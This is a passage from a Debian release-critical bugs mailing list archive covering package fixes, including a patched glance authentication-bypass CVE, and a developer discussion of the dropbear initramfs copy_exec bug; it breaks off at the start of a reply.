Processed: limit source to xcache, tagging 690409

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 #xcache (2.0.0-3) UNRELEASED; urgency=low
 #
 #  * Properly move configfile on upgrade (Closes: #690409).
 #
 limit source xcache
Limiting to bugs with field 'source' containing at least one of 'xcache'
Limit currently set to 'source':'xcache'

 tags 690409 + pending
Bug #690409 [php5-xcache] php5-xcache: upgrades clobber local changes to 
xcache.ini
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
690409: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690409
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692641: marked as done (CVE-2012-4573: Authentication bypass for image deletion)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 08:47:31 +
with message-id e1twnlr-0006pu...@franck.debian.org
and subject line Bug#692641: fixed in glance 2012.1.1-2
has caused the Debian Bug report #692641,
regarding CVE-2012-4573: Authentication bypass for image deletion
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
692641: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692641
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: glance
Version: 2012.1.1-1.1
Severity: critical

Gabe Westmaas from Rackspace reported a vulnerability in Glance
authentication of image deletion requests. Authenticated users may be
able to delete arbitrary, non-protected images from Glance servers. Only
Folsom/Grizzly deployments that expose the v1 API are affected by this
vulnerability. Additionally, Essex deployments that use the
delayed_delete option are also affected.

Below is the proposed patch.

Thomas

diff --git a/glance/api/v1/images.py b/glance/api/v1/images.py
index 9bedf20..2684454 100644
--- a/glance/api/v1/images.py
+++ b/glance/api/v1/images.py
@@ -738,10 +738,10 @@ class Controller(controller.BaseController):
 # to delete the image if the backend doesn't yet store it.
 # See https://bugs.launchpad.net/glance/+bug/747799
 try:
+registry.delete_image_metadata(req.context, id)
 if image['location']:
 schedule_delete_from_backend(image['location'], self.conf,
  req.context, id)
-registry.delete_image_metadata(req.context, id)
 except exception.NotFound, e:
 msg = (Failed to find image to delete: %(e)s % locals())
 for line in msg.split('\n'):

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.2.0-3-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
---End Message---
---BeginMessage---
Source: glance
Source-Version: 2012.1.1-2

We believe that the bug you reported is fixed in the latest version of
glance, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand z...@debian.org (supplier of updated glance package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 27 Aug 2012 12:05:22 +
Source: glance
Binary: python-glance glance-common glance-api glance-registry glance 
python-glance-doc
Architecture: source all
Version: 2012.1.1-2
Distribution: unstable
Urgency: high
Maintainer: PKG OpenStack openstack-de...@lists.alioth.debian.org
Changed-By: Thomas Goirand z...@debian.org
Description: 
 glance - OpenStack Image Service - metapackage
 glance-api - OpenStack Image Service - API server
 glance-common - OpenStack Image Service - common files
 glance-registry - OpenStack Image Service - registry server
 python-glance - OpenStack Image Service - Python client library
 python-glance-doc - OpenStack Image Service - Python library documentation
Closes: 681582 692641
Changes: 
 glance (2012.1.1-2) unstable; urgency=high
 .
   * Added Chinese Debconf translation, thanks to ben duyujie@gmail.com.
   * CVE-2012-4573: Authentication bypass for image deletion (Closes: #692641).
   * Fixes test_interrupt_avoids_respawn_storm fails when run under fakeroot
   disabling the tests (Closes: #681582). Also adds a || true since pep8 is
   neatpicking a source code line as too large.
Checksums-Sha1: 
 412c20f208f8661d7b74f3800931940283236cc6 1971 glance_2012.1.1-2.dsc
 304efa89b183629463fc03b4a1f9a6b67d8f1141 25347 glance_2012.1.1-2.debian.tar.gz
 75ac6ec9eddd6ae75b00e94cf114761205a69c69 235314 
python-glance_2012.1.1-2_all.deb
 79299cc117310a97af279c8f62000c2043420a65 27366 glance-common_2012.1.1-2_all.deb
 632dbfb50af139d26c08322f260029a260c45429 25394 glance-api_2012.1.1-2_all.deb
 d09c6c8ed3fce34b61b966af93ffbcd7bd25bad9 14636 
glance-registry_2012.1.1-2_all.deb
 

Bug#630581: fix for #682964 is incomplete, maybe related to #630581

2012-11-08 Thread Helmut Grohne
So I had a further look into the dropbear initramfs issue. The code
where the breakage occurs is dropbear's hook:

| LIBC_DIR=$(ldd /usr/sbin/dropbear | sed -n -e 's,.* = 
\(/lib.*\)/libc\.so\..*,\1,p')
| for so in $(find ${LIBC_DIR} -name 'libnss_compat*'); do
|   copy_exec ${so} ${LIBC_DIR}
| done

The error lies in the innocent looking copy_exec line. The target is a
directory here, but the documentation of copy_exec says it should be a
file:

| # $1 = file to copy to ramdisk
| # $2 (optional) Name for the file on the ramdisk
| # Location of the image dir is assumed to be $DESTDIR
| # We never overwrite the target if it exists.
| copy_exec() {

So if the target directory happens to not exist which is the case for
LIBC_DIR=/lib/i386-linux-gnu/i686/cmov in my case, the source will be
copied to that name. So cmov ends up being a regular file and not a
directory containing the file.

Now really whose bug is this? Let us have a look at other users that
pass a second parameter to copy_exec.

Those that pass a directory:
/usr/share/initramfs-tools/hooks/keymap:copy_exec /bin/loadkeys /bin
/usr/share/initramfs-tools/hooks/keymap:copy_exec /usr/bin/kbd_mode /bin
/usr/share/initramfs-tools/hooks/dropbear:  copy_exec 
/usr/sbin/dropbear /sbin/
/usr/share/initramfs-tools/hooks/dropbear:  copy_exec 
${so} ${LIBC_DIR}
/usr/share/initramfs-tools/hooks/udev:copy_exec /sbin/udevd  /sbin
/usr/share/initramfs-tools/hooks/udev:copy_exec /sbin/udevadm/sbin
/usr/share/initramfs-tools/hooks/udev:  copy_exec /lib/udev/$program /lib/udev
/usr/share/initramfs-tools/hooks/udev:copy_exec /sbin/blkid /sbin
/usr/share/initramfs-tools/hooks/udev:  copy_exec /lib/udev/vio_type /lib/udev
/usr/share/initramfs-tools/hooks/mdadm:copy_exec $MDADM /sbin
/usr/share/initramfs-tools/hooks/cryptroot: 
copy_exec /lib/cryptsetup/scripts/$KEYSCRIPT /lib/cryptsetup/scripts 2
/usr/share/initramfs-tools/hooks/cryptroot: 
copy_exec $KEYSCRIPT /lib/cryptsetup/scripts 2
/usr/share/initramfs-tools/hooks/cryptroot: 
copy_exec ${KSTYPE#$KEYSCRIPT is } /lib/cryptsetup/scripts 2

The one gets it right:
/usr/share/initramfs-tools/hooks/busybox:   copy_exec ${BUSYBOXDIR}/busybox 
/bin/busybox

It seems like most users actually get this wrong. Out of sheer (bad)
luck this has not been discovered thus far.

How do we proceed now? The current API of copy_exec is bad, because it
relies on auxiliary state (the target being a directory or not). It
should be fixed, but this is likely too late for wheezy, given the
number of packages that need to be changed as well.

The particular dropbear issue can be avoided by actually omitting the
second parameter and letting copy_exec sort it out correctly. I believe
that this change should fix both bugs #682964 and #630581.

Thanks to Tino Keitel for assisting in sorting this out.

Helmut


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#690409: marked as done (php5-xcache: upgrades clobber local changes to xcache.ini)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 09:17:44 +
with message-id e1twof6-0006d0...@franck.debian.org
and subject line Bug#690409: fixed in xcache 2.0.0-3
has caused the Debian Bug report #690409,
regarding php5-xcache: upgrades clobber local changes to xcache.ini
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
690409: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690409
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: php5-xcache
Version: 2.0.0-2
Severity: serious
Justification: §10.7.3 local changes must be preserved during a package upgrade

On upgrades from squeeze to wheezy, any configuration changes made by the
local administrator to the xcache.ini are lost. Moving conffiles should
be done carefully using tools like dpkg-maintscript-helper mv_conffile
to ensure that local changes are not lost.

Note that the exact conffile shipped in squeeze embeds the entire path
to the extension (which it probably should not have done) meaning that
the conffile needs to be updated in some other policy compliant fashion

cheers
Stuart

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (550, 'testing'), (60, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 3.2.0-3-686-pae (SMP w/4 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
---End Message---
---BeginMessage---
Source: xcache
Source-Version: 2.0.0-3

We believe that the bug you reported is fixed in the latest version of
xcache, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 690...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michal Čihař ni...@debian.org (supplier of updated xcache package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 08 Nov 2012 09:48:20 +0100
Source: xcache
Binary: php5-xcache
Architecture: source amd64
Version: 2.0.0-3
Distribution: unstable
Urgency: low
Maintainer: Michal Čihař ni...@debian.org
Changed-By: Michal Čihař ni...@debian.org
Description: 
 php5-xcache - Fast, stable PHP opcode cacher
Closes: 690409
Changes: 
 xcache (2.0.0-3) unstable; urgency=low
 .
   * Do not include full path to extension in xcache.so.
   * Properly move configfile on upgrade (Closes: #690409).
Checksums-Sha1: 
 901674aa7404f81579c662d0a39627f39b6d27bd 1901 xcache_2.0.0-3.dsc
 cf03975fcb1293acd9fce83052e1b0b4068124b6 18304 xcache_2.0.0-3.debian.tar.gz
 9ebff3dd00c5ec73579c0c348dde0331c43e6d83 111510 php5-xcache_2.0.0-3_amd64.deb
Checksums-Sha256: 
 9f22f652a94338c54279f8cbd937d5faff9cfb51d4c6e530fa02d267f9f7a23b 1901 
xcache_2.0.0-3.dsc
 d73c31448c06fcd8569fc0f1452e6b3cb383391a86ebd728f48aac2e8646abd6 18304 
xcache_2.0.0-3.debian.tar.gz
 bbcc2ddfcf173b1a9f37bbb8ef5739a594618b17886243546fb205563898 111510 
php5-xcache_2.0.0-3_amd64.deb
Files: 
 33b8e631a91f2295f6b959e023388696 1901 php optional xcache_2.0.0-3.dsc
 0b36cfa950a330260c867c8ec14768a9 18304 php optional 
xcache_2.0.0-3.debian.tar.gz
 8ab340c6f26430374a42f592fc940bc6 111510 php optional 
php5-xcache_2.0.0-3_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCAAGBQJQm3JaAAoJEGo39bHX+xdNa/MQAN0bFBxLxf23KD68UiuPn9nS
gQ/S4YsFHFl+ow9lwtYevPRtSVl+WDMg7zSazSny2LrgPYS9SwKG4Ceil0R0rROr
/jQ7DLDJio/3ow6zMq/qs0jw/HQ/H2zwh5jt0Fh3rdsGC0BTawl5Sld/4aOHWpc3
YmGfMXchg79B2/Mb2bD+vsJLNj7KJFVVVa2MCZSri1abx4D1OBNHqz0zSUDFS9Hk
m1DGzdPzb/ikCC2dPLkux6g4Le06BRf4GyoDm2ykzYPJSZu9KQJ9wZaPx0+bJ1vm
jlY8cWGgs3+ABPPp8kebz/B/HzNWYdJatzLvOsD0/Lv1giKCAyTAPvF2bqKo/2Q6
giskpOWcZXLtuPiUTcj3aftG4WVtq1M1okmlLAWgonBZqgJ7WqADqQmvN3YZZOhK
y3NtbiFUHcnOsCkzq9bd5mCHVUMrFAn5PVyAxC+4S2uj41slSnNhWbkdgxKp5d3T
WA4v9cg+Hm/KpqLJ/s9f7K/4gb1xKsKaUY6XjrO/lHB9ZzDsb75u5d4a4XZ8/UWm
rZyljwUTNLfOXGcI2CJ4wotCwqjKooU22yF7cSXs9G+BaLEuMEY9ogYjGlOEueqY
3JbsUuKusV9ssJofem9ezGDHwUwbh5wKd4KoZl/0pB+ZkTPhvfPlY73+n2Ukjbxh
GL500Qn/lNJfLJ05XCp9
=u1kF
-END PGP SIGNATUREEnd Message---


Bug#630581: fix for #682964 is incomplete, maybe related to #630581

2012-11-08 Thread Uwe Kleine-König
Hello,

On Thu, Nov 08, 2012 at 09:51:57AM +0100, Helmut Grohne wrote:
 So I had a further look into the dropbear initramfs issue. The code
 where the breakage occurs is dropbear's hook:
 
 | LIBC_DIR=$(ldd /usr/sbin/dropbear | sed -n -e 's,.* = 
 \(/lib.*\)/libc\.so\..*,\1,p')
 | for so in $(find ${LIBC_DIR} -name 'libnss_compat*'); do
 | copy_exec ${so} ${LIBC_DIR}
 | done
 
 The error lies in the innocent looking copy_exec line. The target is a
 directory here, but the documentation of copy_exec says it should be a
 file:
 
 | # $1 = file to copy to ramdisk
 | # $2 (optional) Name for the file on the ramdisk
 | # Location of the image dir is assumed to be $DESTDIR
 | # We never overwrite the target if it exists.
 | copy_exec() {
 
 So if the target directory happens to not exist which is the case for
 LIBC_DIR=/lib/i386-linux-gnu/i686/cmov in my case, the source will be
 copied to that name. So cmov ends up being a regular file and not a
 directory containing the file.
 
 Now really whose bug is this? Let us have a look at other users that
 pass a second parameter to copy_exec.
 
 Those that pass a directory:
 /usr/share/initramfs-tools/hooks/keymap:copy_exec /bin/loadkeys /bin
 /usr/share/initramfs-tools/hooks/keymap:copy_exec /usr/bin/kbd_mode 
 /bin
 /usr/share/initramfs-tools/hooks/dropbear:  copy_exec 
 /usr/sbin/dropbear /sbin/
 /usr/share/initramfs-tools/hooks/dropbear:  copy_exec 
 ${so} ${LIBC_DIR}
 /usr/share/initramfs-tools/hooks/udev:copy_exec /sbin/udevd  /sbin
 /usr/share/initramfs-tools/hooks/udev:copy_exec /sbin/udevadm/sbin
 /usr/share/initramfs-tools/hooks/udev:  copy_exec /lib/udev/$program /lib/udev
 /usr/share/initramfs-tools/hooks/udev:copy_exec /sbin/blkid /sbin
 /usr/share/initramfs-tools/hooks/udev:  copy_exec /lib/udev/vio_type /lib/udev
 /usr/share/initramfs-tools/hooks/mdadm:copy_exec $MDADM /sbin
 /usr/share/initramfs-tools/hooks/cryptroot: 
 copy_exec /lib/cryptsetup/scripts/$KEYSCRIPT /lib/cryptsetup/scripts 2
 /usr/share/initramfs-tools/hooks/cryptroot: 
 copy_exec $KEYSCRIPT /lib/cryptsetup/scripts 2
 /usr/share/initramfs-tools/hooks/cryptroot:   
   copy_exec ${KSTYPE#$KEYSCRIPT is } /lib/cryptsetup/scripts 2
 
 The one gets it right:
 /usr/share/initramfs-tools/hooks/busybox:   copy_exec 
 ${BUSYBOXDIR}/busybox /bin/busybox
 
 It seems like most users actually get this wrong. Out of sheer (bad)
 luck this has not been discovered thus far.
 
 How do we proceed now? The current API of copy_exec is bad, because it
 relies on auxiliary state (the target being a directory or not). It
So copy_exec behaves like cp(1). Maybe introduce a warning for wheezy if
the 2nd argument is a directory in /? This isn't 100% fail-safe but
should catch most cases (among them all of the above instances).

Maybe also keep the cp semantics for copy_exec and only warn in the
failing cases? (i.e. test -d $2  test ! -d $pathtoinitramfs/$2)

Best regards
Uwe

 should be fixed, but this is likely too late for wheezy, given the
 number of packages that need to be changed as well.
 
 The particular dropbear issue can be avoided by actually omitting the
 second parameter and letting copy_exec sort it out correctly. I believe
 that this change should fix both bugs #682964 and #630581.

-- 
Pengutronix e.K.   | Uwe Kleine-König|
Industrial Linux Solutions | http://www.pengutronix.de/  |


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#630581: fix for #682964 is incomplete, maybe related to #630581

2012-11-08 Thread Jérémy Bobbio

Hi!

Thanks for the report and investigating a fix!

On Thu, Nov 08, 2012 at 09:51:57AM +0100, Helmut Grohne wrote:
 The particular dropbear issue can be avoided by actually omitting the
 second parameter and letting copy_exec sort it out correctly. I believe
 that this change should fix both bugs #682964 and #630581.

Do you confirm that leaving out the second parameter creates a correct
initramfs when libc6-i686 is installed?

I have a package ready to be uploaded that correctly works as before for
the usual case.

Cheers,
-- 
Jérémy Bobbio.''`. 
jeremy.bob...@irq7.fr   : :   : lu...@debian.org
`. `'` 
  `-


signature.asc
Description: Digital signature


Bug#692626: non-free files in upstream tarball (The Software shall be used for Good, not Evil)

2012-11-08 Thread Martin Dougiamas
Anyway, I've filed http://tracker.moodle.org/browse/MDL-36457 so we
can replace this code upstream.

On Thu, Nov 8, 2012 at 3:38 PM, Martin Dougiamas mar...@moodle.com wrote:
 /me watches Debian spiral away into its own navel.

 On Thu, Nov 8, 2012 at 3:04 PM, Ansgar Burchardt ans...@debian.org wrote:
 Martin Dougiamas mar...@moodle.com writes:
 Oh come on.  Serious?   That is clearly a joke license.

 Yes, it is considered non-free in Debian and also in other
 distributions, see for example the entry for JSON in Fedora's list of
 bad licenses[1].

   [1] https://fedoraproject.org/wiki/Licensing:Main#Bad_Licenses

 Ansgar



 --
 /// Moodle - open-source software for collaborative learning
 ///
 /// Free software, community, information: http://moodle.org
 /// Commercial support and other services: http://moodle.com



-- 
/// Moodle - open-source software for collaborative learning
///
/// Free software, community, information: http://moodle.org
/// Commercial support and other services: http://moodle.com


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#630581: fix for #682964 is incomplete, maybe related to #630581

2012-11-08 Thread Helmut Grohne
On Thu, Nov 08, 2012 at 11:03:20AM +0100, Jérémy Bobbio wrote:
 Do you confirm that leaving out the second parameter creates a correct
 initramfs when libc6-i686 is installed?

Using pbuilder and a plain sid i386 chroot I verified the following:
1) With libc6-i686 installed the nss_compat files do not end up in the
   initramfs.
2) When locally modifying the hook to leave out the second parameter,
   they do end up in the initramfs.

I did not attempt to boot the resulting initramfs. Given that my
workaround gave me a bootable system, my best guess would be that this
is enough.

I would like to avoid more experimentation with systems I would need
console access if they end up failing to boot. If this is not enough
verification, you'll probably have to set up a virtual machine.

Helmut


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 691074

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 691074 + pending
Bug #691074 [gcc-doc] gcc-doc: Depends on docs for wrong gcc version
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691074: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691074
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 692626, bug 692626 is forwarded to http://tracker.moodle.org/browse/MDL-36457

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 692626 + upstream
Bug #692626 [src:moodle] non-free files in upstream tarball (The Software 
shall be used for Good, not Evil)
Added tag(s) upstream.
 forwarded 692626 http://tracker.moodle.org/browse/MDL-36457
Bug #692626 [src:moodle] non-free files in upstream tarball (The Software 
shall be used for Good, not Evil)
Set Bug forwarded-to-address to 'http://tracker.moodle.org/browse/MDL-36457'.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692626: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692626
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#644024: marked as done (kbibtex: New kbibtex destroys localfile information)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 10:32:30 +
with message-id e1twpps-00063e...@franck.debian.org
and subject line Bug#644024: fixed in kbibtex 0.4-3
has caused the Debian Bug report #644024,
regarding kbibtex: New kbibtex destroys localfile information
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
644024: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=644024
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: kbibtex
Version: 0.3-1
Severity: grave

Set up a localfile field. Save the entry. edit the entry. go to source an d see 
that /some/path/document.pdf is transformed to 
http;:.//document.pdf

It destroy a big part of my bib file, and thus render this package unsable with 
dataloss

Bastien




--- System information. ---
Architecture: amd64
Kernel:   Linux 3.0.0-1-amd64

Debian Release: wheezy/sid
  991 testing ftp.fr.debian.org 

--- Package information. ---
Depends   (Version) | Installed
===-+-===
kdebase-runtime | 4:4.6.5-1+b1
libc6(= 2.2.5) | 2.13-21
libgcc1(= 1:4.1.1) | 1:4.6.1-4
libkdecore5 (= 4:4.4.4-2~) | 4:4.6.5-2
libkdeui5  (= 4:4.3.4) | 4:4.6.5-2
libkfile4  (= 4:4.3.4) | 4:4.6.5-2
libkio5(= 4:4.4.0) | 4:4.6.5-2
libkparts4(= 4:4.5.85) | 4:4.6.5-2
libnepomuk4(= 4:4.3.4) | 4:4.6.5-2
libnepomukutils4  (= 4:4.5.85) | 4:4.6.5-2
libpoppler-qt4-3  (= 0.16) | 0.16.7-2+b1
libqt4-dbus(= 4:4.5.3) | 4:4.7.3-5
libqt4-network (= 4:4.5.3) | 4:4.7.3-5
libqt4-svg (= 4:4.5.3) | 4:4.7.3-5
libqt4-xml (= 4:4.5.3) | 4:4.7.3-5
libqtcore4   (= 4:4.7.0~beta1) | 4:4.7.3-5
libqtgui4  (= 4:4.5.3) | 4:4.7.3-5
libqtwebkit4| 2.1.0~2011week13-2
libsoprano4  (= 2.1.1) | 2.6.0+dfsg.1-4
libstdc++6   (= 4.1.1) | 4.6.1-4
libxml2  (= 2.7.4) | 2.7.8.dfsg-4
libxslt1.1  (= 1.1.25) | 1.1.26-8


Recommends(Version) | Installed
===-+-===
texlive-bibtex-extra| 2009-10


Suggests(Version) | Installed
=-+-===
texlive-latex-base| 2009-14
 OR tetex-extra   | 
bibtex2html   | 1.96-3
latex2rtf | 1.9.19-4.1






---End Message---
---BeginMessage---
Source: kbibtex
Source-Version: 0.4-3

We believe that the bug you reported is fixed in the latest version of
kbibtex, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 644...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès roucaries.bastien+deb...@gmail.com (supplier of updated 
kbibtex package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 05 Nov 2012 11:46:07 +0100
Source: kbibtex
Binary: kbibtex
Architecture: source amd64
Version: 0.4-3
Distribution: unstable
Urgency: low
Maintainer: Debian Science Maintainers 
debian-science-maintain...@lists.alioth.debian.org
Changed-By: Bastien Roucariès roucaries.bastien+deb...@gmail.com
Description: 
 kbibtex- BibTeX editor for KDE
Closes: 644024 654750 687353
Changes: 
 kbibtex (0.4-3) unstable; urgency=low
 .
   * Adopt kbibtex (Closes: #654750)
   * Bug fix: New kbibtex destroys localfile information (Closes: #644024).
   * Bug fix: Spelling error in control file (ressources  resources) in
   control file, thanks to Clayton Casciato (Closes: #687353).
Checksums-Sha1: 
 f15325f7cd4304e7a36f2d84e14b4117bc8e6f04 2062 kbibtex_0.4-3.dsc
 d56dd75d1fa35d2740569b196b58494ccc30d795 6089 kbibtex_0.4-3.debian.tar.gz
 05501afdf6338eae2d548a00660c072fa7f692f2 579064 kbibtex_0.4-3_amd64.deb
Checksums-Sha256: 
 a5f33a7309af3dc4c08a6b8c89eda3431a1216febd2d933c95dbb7b2991c785b 2062 
kbibtex_0.4-3.dsc
 4a7742e2e8d4388d8f98771afb07f374f3cc8e32ac53c03b0e8c32c6abb195b3 6089 

Bug#691783: marked as done (rt4-extension-authenexternalauth: Page not found http://.…./HASH(0x2af24643ee50) when using RT 4.0.8 (and 4.0.7-2))

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 10:32:35 +
with message-id e1twppx-00066k...@franck.debian.org
and subject line Bug#691783: fixed in rt-authen-externalauth 0.10-3
has caused the Debian Bug report #691783,
regarding rt4-extension-authenexternalauth: Page not found 
http://.…./HASH(0x2af24643ee50) when using RT 4.0.8 (and 4.0.7-2)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
691783: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691783
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: rt4-extension-authenexternalauth
Severity: grave
Justification: breaks the package
Version: 0.10-2

It appears that previous versions of RT-Authen-ExternalAuth broke with
the latest security fixes.

Fixed in 0.12:

0.122012-10-26  Thomas Sibley
* Redirect correctly after login on RT 4.0.8, 3.8.15, and the 2012-10-25 
security patches
* Added group_scope as a configurable option.
* Tests: Add to LDAP the base DN under which we search for users/groups

-- 
Dominic Hargreaves | http://www.larted.org.uk/~dom/
PGP key 5178E2A5 from the.earth.li (keyserver,web,email)
---End Message---
---BeginMessage---
Source: rt-authen-externalauth
Source-Version: 0.10-3

We believe that the bug you reported is fixed in the latest version of
rt-authen-externalauth, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 691...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Tom Jampen t...@cryptography.ch (supplier of updated rt-authen-externalauth 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Thu, 08 Nov 2012 07:37:05 +0100
Source: rt-authen-externalauth
Binary: rt4-extension-authenexternalauth
Architecture: source i386
Version: 0.10-3
Distribution: unstable
Urgency: low
Maintainer: Tom Jampen t...@cryptography.ch
Changed-By: Tom Jampen t...@cryptography.ch
Description: 
 rt4-extension-authenexternalauth - External authentication module for request 
tracker 4
Closes: 691783
Changes: 
 rt-authen-externalauth (0.10-3) unstable; urgency=low
 .
   * Adding patch from Thomas Sibley t...@bestpractical.com to redirect
 correctly on RT 4.0.8, 3.8.15, and the 2012-10-25 security patches
 (Closes: #691783).
   * Adding postinst script for clearing the mason cache after configuring
 the package.
   * Fixing incorrect line wrap in previous changelog entry.
Checksums-Sha1: 
 08183014922d0c9fac395d258e0819299a381255 1316 rt-authen-externalauth_0.10-3.dsc
 22d39d470f776755492460a7047da1f913cadb63 4176 
rt-authen-externalauth_0.10-3.debian.tar.xz
 648dffb1739a30c0e13695ea9b18f6d48c1d868b 29432 
rt4-extension-authenexternalauth_0.10-3_i386.deb
Checksums-Sha256: 
 1bf673a04cbe6bf62a8782af954ba88f6ff349b56f98281fe02bf4ab1ba8af61 1316 
rt-authen-externalauth_0.10-3.dsc
 ce741a7a95448b6e3ca3840b95548252b5f13b9f2c27a5135dc220f7651f90e4 4176 
rt-authen-externalauth_0.10-3.debian.tar.xz
 36a99f3482fc343eed53e61c72dfb8fbdeb110e0c8b0463e49401ae8a0e3c189 29432 
rt4-extension-authenexternalauth_0.10-3_i386.deb
Files: 
 91fe5aa54738e944d111c4b01cbe27b3 1316 perl optional 
rt-authen-externalauth_0.10-3.dsc
 74072a1268beef144176b8539f3579f6 4176 perl optional 
rt-authen-externalauth_0.10-3.debian.tar.xz
 939e485b9b62161ee93e270ea7cc9d23 29432 perl optional 
rt4-extension-authenexternalauth_0.10-3_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAlCbiMwACgkQ+C5cwEsrK567RwCbBsLSYJblBq9sfUkMvALLi5JZ
OTwAoMZdHGE+tDvzbASQly2LorTh9E+6
=lkKE
-END PGP SIGNATUREEnd Message---


Bug#630581: fix for #682964 is incomplete, maybe related to #630581

2012-11-08 Thread Jérémy Bobbio
On Thu, Nov 08, 2012 at 11:11:20AM +0100, Helmut Grohne wrote:
